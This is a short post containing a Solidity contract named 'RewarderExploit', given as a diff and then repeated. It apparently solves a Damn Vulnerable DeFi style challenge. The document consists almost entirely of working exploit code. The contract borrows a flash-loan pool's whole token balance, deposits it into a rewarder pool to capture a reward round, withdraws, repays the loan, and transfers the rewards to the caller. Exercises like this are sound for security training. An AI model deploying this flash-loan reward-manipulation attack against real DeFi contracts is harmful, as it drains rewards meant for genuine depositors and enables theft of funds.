0xAnon101 · October 23, 2022 21:09
diff --git a/rewardExploiter.sol b/rewardExploiter.sol
 pragma solidity ^0.8.0;

 import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
 import "hardhat/console.sol";

 contract RewarderExploit {
    address flashLoanPool;
    address rewarderPool;

    IERC20 public immutable liquidityToken;
    IERC20 public immutable rewardToken;

    constructor(
        address _flashLoanPool,
        address _rewarderPool,
        address _liquidityToken,
        address _rewardToken
    ) {
        flashLoanPool = _flashLoanPool;
        rewarderPool = _rewarderPool;
        liquidityToken = IERC20(_liquidityToken);
        rewardToken = IERC20(_rewardToken);
    }

    function receiveFlashLoan(uint256 _amount) external {
        require(msg.sender == flashLoanPool, "Sender is not pool!");
        require(_amount > 0, "_amount should be more than zero! ");

        // approve and deposit the _amount in rewarderpool
        liquidityToken.approve(rewarderPool, _amount);
        (bool deposit, ) = rewarderPool.call(
            abi.encodeWithSignature("deposit(uint256)", _amount)
        );
        require(deposit, "Deposit error!");

        // Send back initial flashLoan
        (bool withdraw, ) = rewarderPool.call(
            abi.encodeWithSignature("withdraw(uint256)", _amount)
        );
        require(withdraw, "Withdraw error!");

        liquidityToken.transfer(address(flashLoanPool), _amount);
    }

    function exploitRewarderPool() external {
        // write the exploit here and take almost all DVT balance
        (bool success, ) = flashLoanPool.call(
            abi.encodeWithSignature(
                "flashLoan(uint256)",
                liquidityToken.balanceOf(address(flashLoanPool))
            )
        );
        require(success, "FlashLoan call failed!");
        rewardToken.transfer(msg.sender, rewardToken.balanceOf(address(this)));
    }

    receive() external payable {}
 }
	pragma solidity ^0.8.0;

	import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
	import "hardhat/console.sol";

	contract RewarderExploit {
	address flashLoanPool;
	address rewarderPool;

	IERC20 public immutable liquidityToken;
	IERC20 public immutable rewardToken;

	constructor(
	address _flashLoanPool,
	address _rewarderPool,
	address _liquidityToken,
	address _rewardToken
	) {
	flashLoanPool = _flashLoanPool;
	rewarderPool = _rewarderPool;
	liquidityToken = IERC20(_liquidityToken);
	rewardToken = IERC20(_rewardToken);
	}

	function receiveFlashLoan(uint256 _amount) external {
	require(msg.sender == flashLoanPool, "Sender is not pool!");
	require(_amount > 0, "_amount should be more than zero! ");

	// approve and deposit the _amount in rewarderpool
	liquidityToken.approve(rewarderPool, _amount);
	(bool deposit, ) = rewarderPool.call(
	abi.encodeWithSignature("deposit(uint256)", _amount)
	);
	require(deposit, "Deposit error!");

	// Send back initial flashLoan
	(bool withdraw, ) = rewarderPool.call(
	abi.encodeWithSignature("withdraw(uint256)", _amount)
	);
	require(withdraw, "Withdraw error!");

	liquidityToken.transfer(address(flashLoanPool), _amount);
	}

	function exploitRewarderPool() external {
	// write the exploit here and take almost all DVT balance
	(bool success, ) = flashLoanPool.call(
	abi.encodeWithSignature(
	"flashLoan(uint256)",
	liquidityToken.balanceOf(address(flashLoanPool))
	)
	);
	require(success, "FlashLoan call failed!");
	rewardToken.transfer(msg.sender, rewardToken.balanceOf(address(this)));
	}

	receive() external payable {}
	}